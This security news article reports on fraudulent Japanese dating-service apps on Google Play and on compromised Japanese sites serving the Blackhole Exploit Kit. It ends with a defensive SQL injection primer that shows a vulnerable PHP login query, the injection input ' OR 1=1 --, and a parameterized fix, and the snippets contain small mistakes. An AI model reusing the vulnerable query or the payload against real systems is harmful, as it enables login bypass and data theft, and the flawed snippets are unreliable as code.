Here Comes A Malicious Dating Site Targeting Japanese Users

Yes, Japan is technologically a very advanced country and when it comes to computing, we have some of the brightest programmers in the field. But we are also aware that unlike users in other countries, most Japanese users don’t really care to understand the dangers that are part of using the Internet. Users though do care a lot about privacy but are still seeing the Net from a decade-old perspective. And malware developers knows this. The only that have kept them away so far has been the language barrier that these individuals have to contend with when developing something solely targeting the Japanese market.

But it seems that this is not longer a problem especially since the introduction of the Android OS. There have been so many one-click-fraud applications on Google Play targeting at Japanese users that it is becoming a game of whack-a-mole. More than 600 malicious applications have been published since the beginning of April and now, another type of well-known fraudulent application–bogus adult dating services are on the increase on Google Play. They offer anything from adult to nonadult image viewers, article collection sites (known as a matome まとめ site in Japan), viewers for a well-known online BBS, information for popular games, silent cameras, and others, as well as the previously mentioned bogus dating services.

Initial screens of fraudulent dating service apps displayed on WebView

Even though that these fraudulent dating-service applications have been published before on Google Play and were taken down, there are still more than 130 available on Google Play with downloads totaling between 90,000 and 310,000.

Do understand that fraudulent dating services is nothing new and have always existed in Japan at least for the past 10 years. They generally operate using decoys, called sakura さくら in Japanese. These are the service operators themselves or paid agents who pretend to want to meet the victims. The sakura have no intention of meeting, but do want to make callers pay money to keep in touch. In most cases, the victims are lured to these malicious sites via spam mails, links on web pages, and search engines. Recently new media–such as social networking services and free messaging tools–also attract victims to these services.

Today, the attackers are increasingly tricking their potential victims into using mobile applications, especially on Google Play. In most cases, these apps simply show fraudulent websites on its WebView component or run a browser to show the sites.

Daisuke Nakajima a mobile malware researcher and part of McAfee‘s Mobile Research and Operations team said that once a user installs one of these applications, its background service using server-to-device push notification mechanism (Google Cloud Messaging) is registered and started. Through this mechanism, the application developer can send any information to the device at any time, and the corresponding background service can run its code in response to the notification. This background processing can occur even when the application itself is not running.

The push notification mechanism is generally used by, for example, a major mobile advertisement network targeted at Android devices in its SDK, and by this any advertisement can be displayed on the devices’ system notification area. By incorporating this ad module, developers can get revenues once the ads are displayed or users buy the advertised services.

By investigating the message contents sent by push notification and displayed on the notification area, it became apparent that in some cases these suspicious applications are receiving and displaying links to the previously mentioned malicious dating-service sites. Other notifications display links to other applications’ download pages on Google Play, probably to gather affiliate revenues. Nonetheless, these applications are risky or even malicious because they try to send users to fraudulent websites.

These applications McAfee said, do not automatically collect private information from the devices or send spam mails/SMS messages; they just lead users to their fraudulent sites. On those sites, users are requested to input their email address on their devices or in some cases their mobile phone numbers.

Once users register for the service, the decoy sends mail, which always has the same message. At first, users can exchange messages with the potential “partner” for free, but the free period suddenly expires just as the decoy promises to meet; the victims have to pay to keep in touch. Sometimes the decoy says she wants to give the victim a huge amount of money and requests a minimum charge to the service to proceed; offers which are not in any way real.

Other characteristics are that users are automatically registered in one or more dating services at the same time, probably operated by the same fraudulent group. Once registered in these services, users will receive a massive amount of spam to trick them into paying money; in the worst case two or three mails are sent every minute, up to more than 1,000 mails per day.

Users can avoid these risks by not registering for the services or not communicating with the service operator even if they accidentally register. They can also use McAfee Mobile Security capable of detecting fraudulent dating-service apps such as Android/DeaiFraud and other common Japanese fraud.



40 Japanese Sites Compromised; Now Serving Malwares

In a related development, Trend Micro said that more than 40 compromised websites popular with Japanese users have been compromised and now serving malware. These were identified using feedback provided by their Deep Discovery Inspector and as of 2 days ago, almost 60,000 hits have been recorded on these sites meaning that more users are still getting infected.

They said one of the compromised sites contains an obfuscated JavaScript (detected as JS_BLACOLE.SMTT) designed to load a hidden iframe that loads behind the user’s browser. The hidden iframe loads a .PHP file (detected as JS_BLACOLE.MT) that checks which software are installed in the user’s computer. After checking, it then loads the appropriate exploits. These lead to the download of malicious PDF files, which exploit an old vulnerability (CVE-2010-0188) in Adobe Reader and Acrobat. Other software applications targeted for exploits include Java and Flash. This behavior indicates that the attacker used the Blackhole Exploit Kit in these attacks.

The malicious PDF files have been detected as TROJ_PIDIEF.MT and once downloaded are saved with legitimate filenames. However they are non-executable and non-malicious files despite their .EXE extension but could easily be replaced by malware. They said that it is possible that this attack was still being tested pending to its release.

Trend Micro is urging end-users to always remember that cybercriminals are catching up with the digital landscape and will take advantage of any online activity—no matter how mundane—to gain more victims. You should also ensure that your installed software is always updated to prevent attacks that use old exploits – like this one – from succeeding.

Site owners are advised to exercise similar precautions with their installed server software, in particular content management systems and to ensure that their own passwords are sufficiently random and difficult to guess by attackers. Inputs should be sanitized as well, to prevent SQL injection attacks.

Structured Query Language (SQL) is used to query, operate, and administer database systems such as Microsoft SQL Server, Oracle, or MySQL. The general use of SQL is consistent across all database systems that support it; however, there are intricacies that are particular to each system.

Database systems are commonly used to provide backend functionality to many types of web applications. In support of web applications, user-supplied data is often used to dynamically build SQL statements that interact directly with a database. A SQL injection attack is an attack that is aimed at subverting the original intent of the application by submitting attacker-supplied SQL statements directly to the backend database. Depending on the web application, and how it processes the attacker-supplied data prior to building a SQL statement, a successful SQL injection attack can have far-reaching implications. The possible security ramifications range from authentication bypass to information disclosure to enabling the distribution of malicious code to application users.

Although the effects of a successful SQL injection attack vary based on the targeted application and how that application processes user-supplied data, SQL injection can generally be used to perform the following types of attacks:

  • Authentication Bypass: This attack allows an attacker to log on to an application, potentially with administrative privileges, without supplying a valid username and password.
  • Information Disclosure: This attack allows an attacker to obtain, either directly or indirectly, sensitive information in a database.
  • Compromised Data Integrity: This attack involves the alteration of the contents of a database. An attacker could use this attack to deface a web page or more likely to insert malicious content into otherwise innocuous web pages.
  • Compromised Availability of Data: This attack allows an attacker to delete information with the intent to cause harm or delete log or audit information in a database.
  • Remote Command Execution: Performing command execution through a database can allow an attacker to compromise the host operating system.

Popular open-source components and CMS tools are also especially vulnerable because potential attackers can examine the code for weaknesses, then automate attack attempts against them. When a website is compromised, the site can become a danger to any visitor who come across it. The best defense against injection attacks is to develop secure habits and adopt policies and procedures that minimize vulnerabilities. Staying aware of the types of attacks you’re vulnerable to because of your programming languages, operating systems and database management systems is critical.

For example, data-driven websites and applications are especially vulnerable to SQL injection attacks.  David Brumbaugh  said that to defend against these, you should never put unfiltered data from the HTTP query string directly into a database query. Instead, parameterize the input when you need to use it raw from the HTTP query string.

He gave the following as a classic example of SQL Injection into a PHP program, and a common defense against it.

$name = $_GET['username'];
$password = $_GET['password'];
$sql = "SELECT * FROM password WHERE name = '$name' AND password='$password'";
$result = mysql_query($sql);

If an attacker were to to enter the following into the form:

' OR 1=1 --

The code would look like this when $password was substituted:

$sql = "SELECT * FROM password WHERE name = '$name' AND password='' OR 1==1 --'";

As you can see, this would always evaluate to true.

However, if the following equivalent code (which uses PDO) were used in its place, the attack attempt would fail:

$name = $_GET['name'];
$password = $_GET['password']
$sql = "SELECT * FROM table WHERE name = ? AND password = ?";
$q = $conn->prepare($sql);

Point your bowser to the following link to read more about A Brute Force Defense Against Injection Attacks

If you are developer or writes code by yourself for your site, he recommends that you take a look at these links:

You can also report any malware or suspicious activity to the JPCERT Coordination Center Incident Response for immediate action.

DEFCON 17: Advanced SQL Injection

Leave a Reply